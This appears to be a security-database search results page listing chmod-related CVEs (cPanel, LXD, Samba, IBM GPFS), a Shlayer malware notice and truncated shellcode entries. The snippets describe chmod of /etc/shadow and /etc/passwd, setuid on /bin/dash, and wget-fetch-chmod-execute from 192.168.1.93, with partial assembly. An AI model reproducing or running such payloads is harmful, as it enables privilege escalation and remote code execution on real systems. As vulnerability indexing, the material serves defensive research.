CVE-2018-20909

cPanel before 70.0.23 allows arbitrary file-chmod operations during legacy incremental backups SEC-338...

Code injection

cPanel before 70.0.23 allows arbitrary file-chmod operations during legacy incremental backups SEC-338...

CVE-2018-20909

cPanel before 70.0.23 allows arbitrary file-chmod operations during legacy incremental backups SEC-338...

CVE-2018-20909

CVE-2018-20909 affects cPanel prior to 70.0.23, where arbitrary file-chmod operations can occur during legacy incremental backups (SEC-338). Multiple sources (NVD, Red Hat advisory, CNVD) confirm the issue and link it to cPanel’s backup handling. The vulnerability arises in the backup process, en...

Linux/x86 chmod(/etc/shadow, 0666) Polymorphic Shellcode (53 bytes)

---------------------- DESCRIPTION ------------------------------------- ; Title: chmod“/etc/shadow”, 0666 and exit for Linux/x86 - Polymorphic ; Author: Daniel Ortiz ; Tested on: Linux 4.18.0-25-generic 26 Ubuntu ; Size: 53 bytes ; SLAE ID: PA-9844 ---------------------- ASM CODE...

Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)

/ LinEnum Linux Enumeration Wget & CHMOD & Run Shellcode Language C & ASM - Linux/x8664 author : Kağan Çapar contact: email protected shellcode len : 155 bytes compilation: gcc -o shellcode shellcode.c test: run ./shellcode description: First, the linenum script is via github with wget command...

Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)

Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow 61 bytes Date: 10/07/2019 Exploit Author: Xavier Invers Fornells Contact: email protected Tested on: Debian 4.19.28 Architecture: x86 Size: 61 bytes chmod.nasm global start section .text start: push byte 15 pop eax push byte...

Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...

CVE-2015-1340

LXD before version 0.19-0ubuntu5 doUidshiftIntoContainer has an unsafe Chmod call that races against the stat in the Filepath.Walk function. A symbolic link created in that window could cause any file on the system to have any mode of the attacker's choice...

Design/Logic Flaw

LXD before version 0.19-0ubuntu5 doUidshiftIntoContainer has an unsafe Chmod call that races against the stat in the Filepath.Walk function. A symbolic link created in that window could cause any file on the system to have any mode of the attacker's choice...

CVE-2015-1340

LXD before version 0.19-0ubuntu5 doUidshiftIntoContainer has an unsafe Chmod call that races against the stat in the Filepath.Walk function. A symbolic link created in that window could cause any file on the system to have any mode of the attacker's choice...

CVE-2015-1340 chmod race in doUidshiftIntoContainer

LXD before version 0.19-0ubuntu5 doUidshiftIntoContainer has an unsafe Chmod call that races against the stat in the Filepath.Walk function. A symbolic link created in that window could cause any file on the system to have any mode of the attacker's choice...

CVE-2015-1340

LXD before version 0.19-0ubuntu5 doUidshiftIntoContainer has an unsafe Chmod call that races against the stat in the Filepath.Walk function. A symbolic link created in that window could cause any file on the system to have any mode of the attacker's choice...

World writable files in Samba AD DC private/ dir

Description During the creation of a new Samba AD DC, files are created in a the private/ subdirectory of our install location. This directory is typically mode 0700, that is owner root only access. However in some upgraded installations it will have other permissions, such as 0755, because this...

TAU Threat Intelligence Notification: New macOS Malware Variant of Shlayer (OSX) Discovered

Carbon Black’s Threat Analysis Unit TAU recently discovered a new variant of a family of macOS malware which was first discovered in February of 2018 by researchers from Intego. TAU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily...

Security Bulletin: IBM Spectrum Scale (GPFS) Hadoop connector is affected by a security vulnerability (CVE-2015-7430)

Summary A security vulnerability has been identified in the IBM Spectrum Scale GPFS Hadoop connector which could allow an unprivileged user the ability to read, write, modify, or delete any data in a GPFS file system CVE-2015-7430 Vulnerability Details CVEID: CVE-2015-7430 DESCRIPTION: IBM Genera...

HP VAN SDN Controller Root Command Injection Exploit

This Metasploit module exploits a hardcoded service token or default credentials in HPE VAN SDN Controller versions 2.7.18.0503 and below to execute a payload as root. A root command injection was discovered in the uninstall action's name parameter, obviating the need to use sudo for privilege...

Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)

Linux/x86 - chmod 4755 /bin/dash Shellcode 33 bytes. Shellcode exploit for Linuxx86 platform / Title: chmod 4755 /bin/dash Author: absolomb Website: https://www.sploitspren.com SLAE-ID: 1208 Purpose: setuid bit on /bin/dash Tested On: Ubuntu 14.04 Arch: x86 Size: 33 bytes global start section .te...

Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)

Linux/x86 - execvecp /bin/sh /tmp/sh; chmod +s /tmp/sh + Null-Free Shellcode 74 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Author: absolomb Website: https://www.sploitspren.com SLAE-ID: 1208 Purpose: cp shell into /tmp and setuid Teste...

Linux/ARM - chmod(/etc/passwd, 0777) Shellcode (39 bytes)

/ Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...